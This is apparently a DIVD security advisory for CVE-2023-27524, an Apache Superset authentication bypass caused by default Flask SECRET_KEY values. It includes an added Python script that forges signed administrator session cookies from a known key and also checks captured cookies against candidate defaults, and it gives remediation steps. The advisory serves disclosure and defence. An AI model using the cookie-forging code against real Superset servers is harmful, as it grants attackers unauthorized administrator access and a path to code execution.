DIVD-2023-00026 - Apache Superset authentication bypass leads to RCE - CVE-2023-27524
Our reference | DIVD-2023-00026 |
Case lead | Finn van der Knaap |
Researcher(s) | |
CVE(s) | CVE-2023-27524 |
Product | Apache Superset |
Versions | |
Recommendation | Rotate the SECRET_KEY and update to the latest version |
Workaround | Rotate the SECRET_KEY by following this article from Apache: [Configuring the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset) |
Status | Open |
Last modified | 06 Jul 2023 13:29 |
Summary
Recently, a write-up was published for a vulnerability in the open source data exploration tool Apache Superset, tracked as CVE-2023-27524. Superset signs its session cookies with the Flask SECRET_KEY. Many installations still run with one of five well-known default values for this key, even though the software's documentation instructs operators to change it. An attacker who knows the key can produce a valid signature for a cookie of their own making, and can therefore forge a session cookie that logs them in as an administrator. From an administrator session the attacker can reach functionality that allows code execution on the server, which is why this authentication bypass leads to RCE.
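To make the mechanism concrete, the following is an added example (not DIVD's or Apache Superset's code) that re-implements, with the Python standard library only, the cookie format Flask produces through itsdangerous' URLSafeTimedSerializer (salt `cookie-session`, HMAC key derivation, SHA-1). It shows both sides: how an attacker who knows the SECRET_KEY forges an administrator session, and how a defender checks whether a captured cookie verifies under a list of candidate default keys. The secret key, the session contents (the `_user_id`/`user_id` names Flask-Login stores are an assumption about the deployed version) and the candidate-key list are constructed for the demo; substitute the default values named in the public write-up to check a real cookie.

```python
"""Forge and verify Flask-style session cookies given a known SECRET_KEY.

Added example, not code from DIVD or Apache Superset. Re-implements the
itsdangerous URLSafeTimedSerializer format Flask uses for its session cookie
(salt "cookie-session", "hmac" key derivation, SHA-1). Keys and session
contents below are constructed for the demonstration.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import List, Optional

SALT = b"cookie-session"  # Flask's default salt for the session cookie

# Constructed placeholders standing in for the default SECRET_KEY values named
# in the CVE-2023-27524 write-up; substitute the documented defaults to scan.
DEFAULT_KEY_CANDIDATES: List[bytes] = [
    b"constructed-default-key-1",
    b"constructed-default-key-2",
]


def _b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC(secret_key, salt)
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def forge_session(secret_key: bytes, session: dict, timestamp: Optional[int] = None) -> str:
    """Produce a cookie value Flask accepts if its SECRET_KEY equals secret_key."""
    # Flask's TaggedJSONSerializer only differs from plain JSON for tuples,
    # bytes, datetimes and similar; ints and strings serialise identically.
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:  # itsdangerous compresses when it pays off
        body = b"." + _b64e(compressed)
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    # itsdangerous 2.x signs the raw Unix time; 1.x subtracts its 2011 epoch (1293840000).
    value = body + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64e(sig)).decode()


def verify_session(secret_key: bytes, cookie: str, max_age: Optional[int] = None,
                   now: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if signature (and optional age) check out, else None."""
    try:
        value, sig = cookie.encode().rsplit(b".", 1)
        body, ts = value.rsplit(b".", 1)
        expected = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
        if not hmac.compare_digest(expected, _b64d(sig)):
            return None
        if max_age is not None:  # Flask applies PERMANENT_SESSION_LIFETIME here
            issued = int.from_bytes(_b64d(ts), "big")
            if (int(time.time()) if now is None else now) - issued > max_age:
                return None
        raw = _b64d(body[1:]) if body.startswith(b".") else _b64d(body)
        payload = zlib.decompress(raw) if body.startswith(b".") else raw
        return json.loads(payload)
    except (ValueError, zlib.error):
        return None


def find_signing_key(cookie: str, candidates: List[bytes]) -> Optional[bytes]:
    """Defender's check: which candidate key, if any, signed this cookie?"""
    for key in candidates:
        if verify_session(key, cookie) is not None:
            return key
    return None


if __name__ == "__main__":
    # Attacker view: a known default key lets anyone mint an admin session.
    # Flask-Login stores the id under "_user_id" (older versions: "user_id");
    # both are set here as an assumption about the deployed version.
    forged = forge_session(DEFAULT_KEY_CANDIDATES[0], {"_user_id": 1, "user_id": 1})
    print("forged cookie:", forged)
    # Defender view: does a captured cookie verify under any known default key?
    print("signed by default key:", find_signing_key(forged, DEFAULT_KEY_CANDIDATES))
```

A cookie that verifies under any candidate key is proof that the deployment still runs a default SECRET_KEY; one that verifies under none of them says nothing about the key's quality, only that it is not one of the candidates tried.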
What you can do
- Rotate the SECRET_KEY by following Apache's article [Configuring the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset), and update to the latest version. Superset also uses the SECRET_KEY to encrypt stored secrets such as database connection passwords, so when rotating the key on an existing installation follow the re-encryption steps described in that article.
What we are doing
- DIVD is currently identifying all the vulnerable Superset servers.
Timeline
Date | Description |
---|---|
02 Jul 2023 | Started research |
02 Jul 2023 | Publishing casefile |
```mermaid
gantt
title DIVD-2023-00026 - Apache Superset authentication bypass leads to RCE - CVE-2023-27524
dateFormat YYYY-MM-DD
axisFormat %e %b %Y
section Case
DIVD-2023-00026 - Apache Superset authentication bypass leads to RCE - CVE-2023-27524 (still open) :2023-07-02, 2023-12-13
section Events
Started research : milestone, 2023-07-02, 0d
Publishing casefile (0 days) : 2023-07-02, 2023-07-02
```